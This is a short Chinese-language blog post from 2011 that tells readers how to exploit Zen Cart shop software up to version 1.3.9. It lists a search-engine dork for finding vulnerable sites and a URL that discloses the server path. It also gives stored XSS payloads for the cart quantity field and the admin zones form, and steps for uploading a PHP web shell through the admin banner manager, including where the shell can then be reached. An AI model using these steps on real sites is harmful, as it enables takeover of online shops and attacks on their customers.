当前位置: iick's blog > 网站漏洞 > Zen Cart 商城系统,上传、跨站漏洞利用

Zen Cart 商城系统,上传、跨站漏洞利用

作者:hack1990 时间:11-05-24 阅读数:583人阅读

Zen Cart是开源、免费的商城系统,用于建立专业的网上商店。Zen Cart 支持多语言、多货币、搜索引擎优化、批量更新,是最安全的网店系统之一。Zen Cart <= v1.3.9存在XSS跨站、脚本上传、路径披露等多个漏洞。

谷歌关键词: intext:"Powered by Zen Cart"

爆路径: http://www.xxx.net/includes/languages/english.php

返回信息:

Fatal error: Call to undefined function zen_href_link() in  /var/www/includes/languages/english.php on line 16

XSS跨站:

    1、http://www.xxx.net/index.php?main_page=shopping_cart

    Qty填写:"><script>alert("XSS")</script>

    点击Change your Quantity(更换数量按钮),刷新触发效果。

    2、http://www.xxx.net/[admin]/zones.php?page=1&action=new

    Zones Code填写:"><script>alert("XSS")</script>

    只有在数据库中才能删除之……

上传漏洞:

    http://www.xxx.net/[admin]/banner_manager.php?action=new

    Tools => Banner Manager => New Banner => Image: phpShell.php

    shell地址:http://www.xxx.net/images/phpShell.php

# Nmap Security Scanner 7.0

上一篇:百度的一个小BUG

下一篇:WordPress固定链接设置方法

相关文章

发表评论